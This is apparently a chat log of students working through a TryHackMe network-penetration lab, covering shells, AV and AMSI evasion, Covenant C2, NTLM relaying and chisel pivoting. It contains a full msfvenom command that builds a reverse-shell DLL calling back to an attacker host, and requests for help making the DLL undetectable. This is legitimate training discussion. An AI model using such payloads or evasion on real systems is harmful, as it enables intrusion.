How did you create your dll? Does your dll bypass AV? Have you tested it on a separate system as recommended?

well i used the msf command as it was shown. not sure if it bypasses the av.

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=7777 -f dll -o not_malicious.dll

this one

admin webserver is down? its not loading

@lone spruce

Did you test it?

You don’t just play Russian roulette in an engagement

ah

yea i forgot that this time

the dll was not deleted neither any alerts were created so i thought everything worked my bad

Task 34, "To download our malicious grunt, we can set up an HTTP server on our attacking machine using python, updog, etc and use iex or Invoke-WebRequest to make a remote call to our server. Find the download payload below." is written twice

Anyone can confirm?

Maybe I don’t know there’s a lot happening

There are probably several holo networks, you should tell the IP

it can help if you provide more detail: subnet, last reset, etc

tho can you give an idea as to what we can do to make the dll undetectable

admin.holo.live are you guys able to login??

I dont think anybody is able to help if you dont provide an IP

L-SRV01

subnet

10.200.x.0 what is x for u? @gloomy ravine

69

yeah thats the problematic one

is www down again on it?

or is it something else

I just got a shell in S-SRV01 with a 1 liner reverse powershell, skipping the whole Obfuscation/AV-Evasion stuff. Is this expected to happen? Is the whole AV Evasion stuff there because the Covenant payload raises lots of flags?

i cant login to admin dashboard on 10.200.69.33

👀 you are not alone. tho u must have done the amsi bypass?

Nope, nothing

whaa-

dm me the credentials you're trying on it

maybe someone disabled amsi before you

I guess that could be

totally offtopic but I am a big fan of you 🙌

^^^

🙂

@river cradle szy a little help 👀 can you tell something to bypass av for the dll. stuck on it for quite a bit

can't help with that atm 😅

ah np

That’s already extensively covered in the tasks

well

i did with the

powershell

script

not sure about this one

I mean it went over extensively how to clean covenant so

😅 about that i wasnt able to use covenant. it creates alot of red flags so had to fallback to simple reverse shell powershell script with amsi bypass ahead of it

of course it creates a lot of red flags lol that’s why you clean it

also idk why when i got the shell i tried executing the covenant binary it just executed but didnt create a reverse shell

av was disabled

still

Could’ve been a bunch of reasons who knows

yea

and by test I didn’t mean test against AV

have you tried running the application on a separate machine and seeing if the dll gets called

ie popping a shell on your own windows VM

nopes i didnt cause it was a remote machine. lemme try it once and would reach back to you for further help

well no shell but when i place the dll, it doesnt even start the gui. and runs process in background. but yea no idea why but no shells

poppin up

i tried getting a reverse shell from the same machine to the same machine

Side note for those who have gotten every flag except S-SRV02 - I'm actively checking to see who's at 105/106 and will DM you the flag on THM until the issue gets resolved 🙂

@wind bobcat hello so i finally reached to ntlm relaying part. I was having a problem can i ask if u are free?

about to sleep, ask away and I'll get to you first thing in the morning

oh i am sorry goodnight. it worked now had to log off the users before restarting

I can't access web server on S-SRV01 under task 27, and can't find any open ports as well with nmap

all ports scan is going on

and on default ports 80, 8080 tried accessing the website but nope

Whats the difference in a Covenant listener between the Bind Address port and the connect port?

Bind address port is the port+address covenant will use to start a listener up (you can use 0.0.0.0 to listen on all interfaces or select a specific one)
The connect address is used as the address the grunts will use to connect and is different in case you want to have the C2 traffic go through a proxy or a redirector of some sorts

did you set up the pivot with sshuttle or chisel?

yup

which one

chisel

then you need to run nmap through that socks proxy from chisel

proxychains <nmap command here>

and ofc change the proxychains config before that

did that added 127.0.0.1:1080

got this address from chisel

yeah so now you should be able to run nmap through proxychains

i forgot to run browser with proxychains

damm, thanks 🙂